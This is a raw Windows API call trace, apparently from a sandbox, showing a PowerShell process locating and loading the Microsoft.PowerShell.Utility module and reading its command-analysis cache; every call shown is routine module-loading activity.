	[0050.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x184c18bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f
	[0050.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x184c18bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63
	[0050.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c330) returned 1
	[0050.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x184c18c410 | out: lpFileInformation=0x184c18c410*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0050.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c2f0) returned 1
	[0050.103] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff
	[0050.103] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff
	[0050.103] CoTaskMemAlloc (cb=0x218) returned 0x1505fbbf500
	[0050.103] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbbf500, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0050.104] CoTaskMemFree (pv=0x1505fbbf500) 
	[0050.104] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0050.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c0f0) returned 1
	[0050.104] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c1d0 | out: lpFileInformation=0x184c18c1d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0050.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c0b0) returned 1
	[0050.104] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0050.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0050.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c0f0) returned 1
	[0050.108] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c1d0 | out: lpFileInformation=0x184c18c1d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0050.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c0b0) returned 1
	[0050.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0050.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c0f0) returned 1
	[0050.108] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18c1d0 | out: lpFileInformation=0x184c18c1d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0050.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c0b0) returned 1
	[0050.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x184c18bb10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50
	[0050.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bf50) returned 1
	[0050.108] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x184c18c030 | out: lpFileInformation=0x184c18c030*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0050.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf10) returned 1
	[0050.109] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff
	[0050.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x184c18bb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58
	[0050.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18bf50) returned 1
	[0050.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x184c18c030 | out: lpFileInformation=0x184c18c030*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0050.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18bf10) returned 1
	[0050.110] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff
	[0050.112] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20
	[0050.116] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc14e0
	[0050.116] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbc14e0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0050.116] CoTaskMemFree (pv=0x1505fbc14e0) 
	[0050.117] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbfd80
	[0050.117] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbfd80 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.117] CoTaskMemFree (pv=0x1505fbbfd80) 
	[0050.117] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.117] GetCurrentProcess () returned 0xffffffffffffffff
	[0050.117] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18b888 | out: TokenHandle=0x184c18b888*=0x6b0) returned 1
	[0050.117] GetTokenInformation (in: TokenHandle=0x6b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18b988 | out: TokenInformation=0x0, ReturnLength=0x184c18b988) returned 0
	[0050.117] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505f48d880
	[0050.117] GetTokenInformation (in: TokenHandle=0x6b0, TokenInformationClass=0x1, TokenInformation=0x1505f48d880, TokenInformationLength=0x2c, ReturnLength=0x184c18b988 | out: TokenInformation=0x1505f48d880, ReturnLength=0x184c18b988) returned 1
	[0050.117] LocalFree (hMem=0x1505f48d880) returned 0x0
	[0050.118] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047708400, cbSid=0x184c18b980 | out: pSid=0x15047708400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18b980) returned 1
	[0050.118] CreateMutexW (lpMutexAttributes=0x15047708550, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x6b4
	[0050.118] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18b820*=0x6b4, lpdwindex=0x184c18b5f4 | out: lpdwindex=0x184c18b5f4) returned 0x0
	[0050.118] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc0e80
	[0050.118] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbc0e80, nSize=0x10a | out: lpBuffer="Ȇ") returned 0x0
	[0050.118] CoTaskMemFree (pv=0x1505fbc0e80) 
	[0050.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0050.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b970) returned 1
	[0050.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x15047708bf0 | out: lpFileInformation=0x15047708bf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0050.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b930) returned 1
	[0050.119] ReleaseMutex (hMutex=0x6b4) returned 1
	[0050.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0050.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b820) returned 1
	[0050.119] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6c8
	[0050.119] GetFileType (hFile=0x6c8) returned 0x1
	[0050.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b790) returned 1
	[0050.119] GetFileType (hFile=0x6c8) returned 0x1
	[0050.119] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.120] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.120] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.120] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.120] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.121] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x298, lpOverlapped=0x0) returned 1
	[0050.121] ReadFile (in: hFile=0x6c8, lpBuffer=0x15047709f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b8f8, lpOverlapped=0x0 | out: lpBuffer=0x15047709f48*, lpNumberOfBytesRead=0x184c18b8f8*=0x0, lpOverlapped=0x0) returned 1
	[0050.121] CloseHandle (hObject=0x6c8) returned 1
	[0050.233] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf2e0
	[0050.233] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbf2e0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.233] CoTaskMemFree (pv=0x1505fbbf2e0) 
	[0050.233] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.233] GetCurrentProcess () returned 0xffffffffffffffff
	[0050.233] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18b898 | out: TokenHandle=0x184c18b898*=0x6c8) returned 1
	[0050.233] GetTokenInformation (in: TokenHandle=0x6c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18b998 | out: TokenInformation=0x0, ReturnLength=0x184c18b998) returned 0
	[0050.233] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505f48d880
	[0050.233] GetTokenInformation (in: TokenHandle=0x6c8, TokenInformationClass=0x1, TokenInformation=0x1505f48d880, TokenInformationLength=0x2c, ReturnLength=0x184c18b998 | out: TokenInformation=0x1505f48d880, ReturnLength=0x184c18b998) returned 1
	[0050.234] LocalFree (hMem=0x1505f48d880) returned 0x0
	[0050.234] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047919830, cbSid=0x184c18b990 | out: pSid=0x15047919830*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18b990) returned 1
	[0050.234] CreateMutexW (lpMutexAttributes=0x15047919980, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x6cc
	[0050.234] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18b830*=0x6cc, lpdwindex=0x184c18b604 | out: lpdwindex=0x184c18b604) returned 0x0
	[0050.259] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc14e0
	[0050.259] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbc14e0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0050.259] CoTaskMemFree (pv=0x1505fbc14e0) 
	[0050.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0050.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b8c0) returned 1
	[0050.260] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1504791e6e8 | out: lpFileInformation=0x1504791e6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0050.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b880) returned 1
	[0050.260] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18b300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b740) returned 1
	[0050.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18b820 | out: lpFileInformation=0x184c18b820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b700) returned 1
	[0050.260] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18b1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0050.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b680) returned 1
	[0050.260] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6bc
	[0050.260] GetFileType (hFile=0x6bc) returned 0x1
	[0050.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b5f0) returned 1
	[0050.261] GetFileType (hFile=0x6bc) returned 0x1
	[0050.261] ReadFile (in: hFile=0x6bc, lpBuffer=0x1504791fce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b4e8, lpOverlapped=0x0 | out: lpBuffer=0x1504791fce0*, lpNumberOfBytesRead=0x184c18b4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.263] ReadFile (in: hFile=0x6bc, lpBuffer=0x15047921a54, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18b118, lpOverlapped=0x0 | out: lpBuffer=0x15047921a54*, lpNumberOfBytesRead=0x184c18b118*=0x2b, lpOverlapped=0x0) returned 1
	[0050.263] ReadFile (in: hFile=0x6bc, lpBuffer=0x1504791fce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b1b8, lpOverlapped=0x0 | out: lpBuffer=0x1504791fce0*, lpNumberOfBytesRead=0x184c18b1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.265] ReadFile (in: hFile=0x6bc, lpBuffer=0x15047921a8c, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18af68, lpOverlapped=0x0 | out: lpBuffer=0x15047921a8c*, lpNumberOfBytesRead=0x184c18af68*=0x9, lpOverlapped=0x0) returned 1
	[0050.265] ReadFile (in: hFile=0x6bc, lpBuffer=0x1504791fce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b008, lpOverlapped=0x0 | out: lpBuffer=0x1504791fce0*, lpNumberOfBytesRead=0x184c18b008*=0x1000, lpOverlapped=0x0) returned 1
	[0050.265] ReadFile (in: hFile=0x6bc, lpBuffer=0x15047921ac4, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18b158, lpOverlapped=0x0 | out: lpBuffer=0x15047921ac4*, lpNumberOfBytesRead=0x184c18b158*=0xb, lpOverlapped=0x0) returned 1
	[0050.265] ReadFile (in: hFile=0x6bc, lpBuffer=0x1504791fce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b158, lpOverlapped=0x0 | out: lpBuffer=0x1504791fce0*, lpNumberOfBytesRead=0x184c18b158*=0x1000, lpOverlapped=0x0) returned 1
	[0050.265] ReadFile (in: hFile=0x6bc, lpBuffer=0x1504791fce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b068, lpOverlapped=0x0 | out: lpBuffer=0x1504791fce0*, lpNumberOfBytesRead=0x184c18b068*=0xd9b, lpOverlapped=0x0) returned 1
	[0050.265] ReadFile (in: hFile=0x6bc, lpBuffer=0x1504791fce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b4b8, lpOverlapped=0x0 | out: lpBuffer=0x1504791fce0*, lpNumberOfBytesRead=0x184c18b4b8*=0x0, lpOverlapped=0x0) returned 1
	[0050.265] CloseHandle (hObject=0x6bc) returned 1
	[0050.271] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbeea0
	[0050.271] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbeea0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.271] CoTaskMemFree (pv=0x1505fbbeea0) 
